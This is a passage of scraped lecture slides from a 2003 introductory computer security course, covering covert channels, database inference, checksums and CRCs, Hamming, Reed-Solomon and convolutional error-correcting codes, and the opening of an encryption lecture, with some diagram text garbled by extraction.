Sometimes a system can have an unexpected path of trans-mission of data, termed a covert channel, and through theuse of this covert channel information may be leaked eitherby a malicious program, or by accident.
CS3235 - Hugh Anderson’s notes. Page number: 272
![Page 274: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/274.jpg)
Confinement and covert channels
Consider the set of permissions on a file.
An unscrupulous program could modify these permissionscyclically to transmit a very-low data-rate message to an-other unscrupulous program.
CS3235 - Hugh Anderson’s notes. Page number: 273
![Page 275: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/275.jpg)
Confinement and covert channels
We categorize covert channels into two:
1. Storage channels: using the presence or absence ofobjects
2. Timing channels: the speed of events
We can attempt to identify covert channels by building ashared resource matrix, determining which processes canread and write which resources.
CS3235 - Hugh Anderson’s notes. Page number: 274
![Page 276: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/276.jpg)
Attacks on databases
Governing body may keep secret individual information,but release cumulative information
For example: Today’s average temperature of SOC staffby nationality:
Singaporean Malaysian PRC Poland German Australian New Zealand ....
36.8 36.7 36.9 37.1 36.5 38.2 38.1 ....
CS3235 - Hugh Anderson’s notes. Page number: 275
![Page 277: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/277.jpg)
Attacks on databases
OK - doesn’t release any sensitive information, but
what if another part of the database released the num-bers of SOC staff by nationality...
Singaporean Malaysian PRC Poland German Australian New Zealand ....
23 12 14 3 5 4 1 ....
By inference you can deduce that the temperature of aparticular individual is too high!
CS3235 - Hugh Anderson’s notes. Page number: 276
![Page 278: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/278.jpg)
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
CS3235 - Hugh Anderson’s notes. Page number: 277
![Page 279: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/279.jpg)
Simple check codes
Transmit data:
1 65 3 22 47 2
Transmit data+checksum:
1 65 3 22 47 2 140
CS3235 - Hugh Anderson’s notes. Page number: 278
![Page 280: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/280.jpg)
One-way parity
A 0 1 0 0 0 0 0 10 0 0 1 1 0 0 0 0D 0 1 0 0 0 1 0 0B 0 1 0 0 0 0 1 0B 0 1 0 0 0 0 1 0C 0 1 0 0 0 0 1 1
Check: 0 1 1 1 0 1 1 0
CS3235 - Hugh Anderson’s notes. Page number: 279
![Page 281: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/281.jpg)
Two way parity
A 0 1 0 0 0 0 0 1 00 0 0 1 1 0 0 0 0 0D 0 1 0 0 0 1 0 0 0B 0 1 0 0 0 0 1 0 0B 0 1 0 0 0 0 1 0 0C 0 1 0 0 0 0 1 1 1
Check: 0 1 1 1 0 1 1 0 X
CS3235 - Hugh Anderson’s notes. Page number: 280
![Page 282: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/282.jpg)
Simple check codes
Parity of bits - detects all 1 bit errors, but...
Horizontal and vertical parity - better, but problems withrepetitive errors
Sum of values - problems with repetitive errors
Want better level of error checking
CS3235 - Hugh Anderson’s notes. Page number: 281
![Page 283: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/283.jpg)
Cyclic redundancy check codes
Treat the stream of transmitted bits as a representation of apolynomial with coefficients of 1:
10110 = x4 + x2 + x1 = F (x)
Checksum bits are added to ensure that the final compositestream of bits is divisible by some other polynomial g(x).
CS3235 - Hugh Anderson’s notes. Page number: 282
![Page 284: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/284.jpg)
Cyclic redundancy check codes
We can transform any stream F (x) into a stream T (x)which is divisible by g(x).
If there are errors in T (x), they take the form of a dif-ference bit string E(x) and the final received bits areT (x) + E(x).
When the receiver gets a correct stream, it divides it byg(x) and gets no remainder.
CS3235 - Hugh Anderson’s notes. Page number: 283
![Page 285: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/285.jpg)
Cyclic redundancy check codes
The question is: How likely is that T (x) + E(x) will alsodivide with no remainder?
Single bits? - No a single bit error means that E(x)will have only one term (x1285 say). If the generatorpolynomial has xn + ... + 1 it will never divide evenly.
Multiple bits? - Various generator polynomials areused with different properties. Must have one factor ofthe polynomial being x1 + 1, because this ensures allodd numbers of bit errors (1,3,5,7...).
CS3235 - Hugh Anderson’s notes. Page number: 284
![Page 286: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/286.jpg)
Some common generators:
• CRC-12 - x12 + x11 + x3 + x2 + x1 + 1
• CRC-16 - x16 + x15 + x2 + 1
• CRC-32 - x32+x26+x23+x22+x16+x12+x11+x10+x8+x7+x5+x4+x2+1
• CRC-CCITT - x16 + x12 + x5 + 1
CS3235 - Hugh Anderson’s notes. Page number: 285
![Page 287: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/287.jpg)
Long division is easy!
Generator g(x): x5 + x2 + 1 (100101) and F (x): 101101011.
divide F (x) by g(x), and the remainder is appended to F (x)to give T (x):
1010.01000100101 )101101011.00000
100101100001100101
1001.001001.01
1000
T (x) = 10110101101000.
CS3235 - Hugh Anderson’s notes. Page number: 286
![Page 288: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/288.jpg)
Long division is easy!
When this stream is received, it is divided but now will haveno remainder if the stream is received without errors.
QD
C
S/RQD
C
S/R QD
C
S/RQD
C
S/RQD
C
S/R
Data
Clock
XORXOR
D1D0 D2 D3 D4
CS3235 - Hugh Anderson’s notes. Page number: 287
![Page 289: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/289.jpg)
Long division is easy!
Input data D4 D3 D2 D1 D0 Note
... 0 0 0 0 0 Initial state
1 0 0 0 0 1 First bit
0 0 0 0 1 0 Second bit
1 0 0 1 0 1 Third bit
1 0 1 0 1 1
0 1 0 1 1 0
1 0 1 0 0 0
0 1 0 0 0 0
1 0 0 1 0 0
...
CS3235 - Hugh Anderson’s notes. Page number: 288
![Page 290: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/290.jpg)
Long division is easy!
Input data D4 D3 D2 D1 D0 Note
...
1 0 1 0 0 1
0 1 0 0 1 0
0 0 0 0 0 1
0 0 0 0 1 0
0 0 0 1 0 0
0 0 1 0 0 0
CS3235 - Hugh Anderson’s notes. Page number: 289
![Page 291: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/291.jpg)
Case study: ethernet
Ethernet is used for networking computers, principally be-cause of its speed and low cost. The maximum size of anethernet frame is 1514 bytes6, and a 32-bit FCS is calcu-lated over the full length of the frame.
The FCS used is:
• CRC-32 - x32+x26+x23+x22+x16+x12+x11+x10+x8+x7+x5+x4+x2+1
61500 bytes of data, a source and destination address each of six bytes, and a twobyte type identifier. The frame also has a synchronizing header and trailer which is notchecked by a CRC.
CS3235 - Hugh Anderson’s notes. Page number: 290
![Page 292: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/292.jpg)
This session
• Information flow
• Simple error detection
• Simple error correction
• Encryption
CS3235 - Hugh Anderson’s notes. Page number: 291
![Page 293: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/293.jpg)
Simple error correction
Methods used to correct errors:
• Ignore errors, while acknowledging correct data. ARQ(for Automatic Repeat reQuest).
• Error correcting codes (for computer memory)
CS3235 - Hugh Anderson’s notes. Page number: 292
![Page 294: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/294.jpg)
Code types
We can divide error correcting codes (ECC) into continu-ous and block-based types. Convolutional encodings areused for continuous systems, and the common block-basedcodes are:
• Hamming codes (for correcting single bit errors),
• Golay codes (for correcting up to three bit errors), and
• Bose-Chaudhuri-Hocquenghem (BCH ) codes (for cor-recting block errors).
CS3235 - Hugh Anderson’s notes. Page number: 293
![Page 295: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/295.jpg)
Combining error correcting codes
Different types of error correcting codes can be com-bined to produce composite codes.
For example, Reed-Solomon block-codes are often com-bined with convolutional codes to improve all-round per-formance.
In this combined setup, the convolutional code correctsrandomly distributed bit errors but not bursts of errorswhile the Reed-Solomon code corrects the burst errors.
CS3235 - Hugh Anderson’s notes. Page number: 294
![Page 296: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/296.jpg)
Accepting bad data
Sometimes we are willing to accept bad data...
CS3235 - Hugh Anderson’s notes. Page number: 295
![Page 297: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/297.jpg)
BER and noise
System Error rate (errors/bit)
Wiring of internal circuits 10−15
Memory chips 10−14
Hard disk 10−9
Optical drives 10−8
Coaxial cable 10−6
Optical disk (CD) 10−5
Telephone System 10−4
CS3235 - Hugh Anderson’s notes. Page number: 296
![Page 298: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/298.jpg)
BER and noise
We can determine the theoretical channel capacity knowingthe SNR:
• BER is 0.01, channel capacity C ' 0.92 bits/symbol.
• BER is 0.001, channel capacity C ' 0.99 bits/symbol.
• BER is 0, channel capacity C = 1 bits/symbol.
The theoretical maximum channel capacity is quite close tothe perfect channel capacity, even if the BER is high.
CS3235 - Hugh Anderson’s notes. Page number: 297
![Page 299: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/299.jpg)
Reducing BER
Increase the signal (power), or
Reduce the noise (often not possible), or
Use ECC.
The benefit of error correcting codes is that they can im-prove the received BER without increasing the transmittedpower. This performance improvement is measured as asystem gain .
CS3235 - Hugh Anderson’s notes. Page number: 298
![Page 300: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/300.jpg)
Reducing BER
Example: Consider a system without ECC giving a BER of0.001 with a S/N ratio of 30dB (1000:1). If we were to usean ECC codec, we might get the same BER of 0.001 witha S/N ratio of 20dB (100:1). We say that the system gaindue to ECC is 10dB (10:1).
CS3235 - Hugh Anderson’s notes. Page number: 299
![Page 301: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/301.jpg)
Bad ECC scheme: repetition
An initial scheme to correct transmission errors might be tojust repeat bits7.
Data: 0 1 0 0 1 1 1 1 ...Transmit: 000111000000111111111111...
If we send three identical bits for every bit we wish to trans-mit, we can then use a voting system to determine the mostlikely bit. If our natural BER due to noise was 0.01, with threebits we would achieve a synthetic BER of 0.0001, but ourchannel capacity is reduced to about C = 0.31 bits/symbol.
7Note: there is no point in repeating bits twice. you must repeat three times, or 5times, and then vote to decide the best value.
CS3235 - Hugh Anderson’s notes. Page number: 300
![Page 302: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/302.jpg)
Bad ECC scheme: repetition
We can see from this that the rate of transmission us-ing repetition has to approach zero to achieve more andmore reliable transmission.
However we know that the theoretical rate should beequal to or just below the channel capacity C.
Convolutional and other encodings can achieve rates oftransmission close to the theoretical maximum.
CS3235 - Hugh Anderson’s notes. Page number: 301
![Page 303: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/303.jpg)
ECC scheme: Hamming
Hamming codes are block-based error correcting codes.
We add hamming bits to a string
Here we derive the inequality used to determine howmany extra hamming bits are needed for an arbitrary bitstring.
CS3235 - Hugh Anderson’s notes. Page number: 302
![Page 304: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/304.jpg)
ECC scheme: Hamming
The hamming distance is a measure of how FAR apart twobit strings are.
A: 0 1 0 1 1 1 0 0 0 1 1 1B: 0 1 1 1 1 1 1 0 0 1 0 1A XOR B: 0 0 1 0 0 0 1 0 0 0 1 0
CS3235 - Hugh Anderson’s notes. Page number: 303
![Page 305: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/305.jpg)
ECC scheme: Hamming
If we had two bit strings X and Y representing two char-acters, and the hamming distance between any two codeswas d, we could turn X into Y with d single bit errors.
• If we had an encoding scheme (for say ASCII characters)and the minimum hamming distance between any twocodes was d + 1, we could detect d single bit errors8.
• We can correct up to d single bit errors in an encodingscheme if the minimum hamming distance is 2d + 1.
8Because the code d bits away from a correct code is not in the encoding.
CS3235 - Hugh Anderson’s notes. Page number: 304
![Page 306: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/306.jpg)
ECC scheme: Hamming
If we now encode m bits using r extra hamming bits to makea total of n = m + r , we can count how many correct andincorrect hamming encodings we should have. With m bitswe have 2m unique messages - each with n illegal encod-ings, and:
(n + 1)2m ≤ 2n
(m + r + 1)2m ≤ 2n
m + r + 1 ≤ 2n−m
m + r + 1 ≤ 2r
CS3235 - Hugh Anderson’s notes. Page number: 305
![Page 307: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/307.jpg)
ECC scheme: Hamming
We solve this inequality, and then choose R, the next integerlarger than r.
Example: If we wanted to encode 8 bit values (m = 8) andbe able to recognise single bit errors:
8 + r + 1 ≤ 2r
9 ≤ 2r − r
r ' 3.5
R = 4
CS3235 - Hugh Anderson’s notes. Page number: 306
![Page 308: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/308.jpg)
Reed-Solomon codes
Reed-Solomon codes are block-based error correctingcodes which are particularly good at correcting bursts(sequences) of bit errors.
They are found in a wide range of digital communicationsand storage applications.
Reed-Solomon codes are used to correct errors in digitalwireless applications such as wireless LAN systems, andlow Earth orbit (LEO) satellite communication systems.
CS3235 - Hugh Anderson’s notes. Page number: 307
![Page 309: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/309.jpg)
Reed-Solomon codes
A Reed-Solomon code is specified as
• RS(n,k) with s-bit symbols.
This means that the encoder takes k data symbols of s bitseach and adds parity symbols to make an n symbol Thereare n− k parity symbols of s bits each.A Reed-Solomon decoder can correct up to t symbols thatcontain errors in a codeword, where
2t = n− k
CS3235 - Hugh Anderson’s notes. Page number: 308
![Page 310: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/310.jpg)
Reed-Solomon code
Example: A popular Reed-Solomon code is RS(255,223)with 8-bit symbols. Each codeword contains 255 code wordbytes, of which 223 bytes are data and 32 bytes are parity.In this example, n = 255, k = 223, and s = 8.
2t = 32
and so t = 16
The Reed-Solomon decoder in this example can correct any16 symbol errors in the codeword.
CS3235 - Hugh Anderson’s notes. Page number: 309
![Page 311: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/311.jpg)
Chapter 7
Lecture 7 - Encryption
CS3235 - Hugh Anderson’s notes. Page number: 310
![Page 312: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/312.jpg)
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to the lecture before...
CS3235 - Hugh Anderson’s notes. Page number: 311
![Page 313: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/313.jpg)
Last session
• Information flow
• Simple error detection
• Simple error correction
CS3235 - Hugh Anderson’s notes. Page number: 312
![Page 314: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/314.jpg)
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 313
![Page 315: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/315.jpg)
Key points from last week
Error detection vs Error correction
Mathematical analysis
Error rate, noise, channel capacity
Theoretical vs actual channel capacity
CS3235 - Hugh Anderson’s notes. Page number: 314
![Page 316: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/316.jpg)
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 315
![Page 317: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/317.jpg)
Convolutional codes
Convolutional codes operate continuously and so are es-pecially useful in data transmission systems.
The convolutional encoder operates on a continuousstream of data using a shift-register to produce a con-tinuous encoded output stream.
CS3235 - Hugh Anderson’s notes. Page number: 316
![Page 318: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/318.jpg)
Convolutional codes
QD
C
S/RData In
Data OutS/R
C
D QDQS/R
C
Received bit sequence can be examined for the most likelycorrect output sequence
CS3235 - Hugh Anderson’s notes. Page number: 317
![Page 319: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/319.jpg)
Trellis diagram
000000
00
00
11 11111111
00
B
A
D
00000000
C
11
1010
01 01
101001 010101
01
10
11
11 11 11
10
01 01
101010
CS3235 - Hugh Anderson’s notes. Page number: 318
![Page 320: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/320.jpg)
Most likely path
If we were to input the sequence 011010, we would get thefollowing trace through the trellis, with the bit sequence out-put as 001110110101:
D
B
A
C
10 0101111100
CS3235 - Hugh Anderson’s notes. Page number: 319
![Page 321: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/321.jpg)
Convolutional codes
Determine the most likely path, even with large numbersof bit errors.
A convolutional encoding can often reduce errors by afactor of 102 to 103.
CS3235 - Hugh Anderson’s notes. Page number: 320
![Page 322: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/322.jpg)
Viterbi decoding
The Viterbi algorithm tries to find the most likely re-ceived data sequence, by keeping track of the four mostlikely paths through the trellis.
For each path, a running count of the hamming distancebetween the received sequence and the path is main-tained.
The most likely received string is the one with the lowesthamming distance.
CS3235 - Hugh Anderson’s notes. Page number: 321
![Page 323: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/323.jpg)
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 322
![Page 324: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/324.jpg)
Encryption and authentication
Security and Cryptographic systems act to reduce failure ofsystems due to the following threats:
Interruption - attacking the availability of a service (Denialof Service).
Interception - attacks confidentiality.
Modification - attacks integrity.
Fabrication - attacks authenticity. Note that you may notneed to decode a signal to fabricate it - you might justrecord and replay it.
CS3235 - Hugh Anderson’s notes. Page number: 323
![Page 325: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/325.jpg)
Encoding and deciphering
I could have told her the truth - that the same cal-culation which had served me for deciphering themanuscript had enabled me to learn the word - but ona caprice it struck me to tell her that a genie had re-vealed it to me. This false disclosure fettered Madamed’Urfé to me. That day I became the master of hersoul, and I abused my power.
We call these systems symmetric key systems...
CS3235 - Hugh Anderson’s notes. Page number: 324
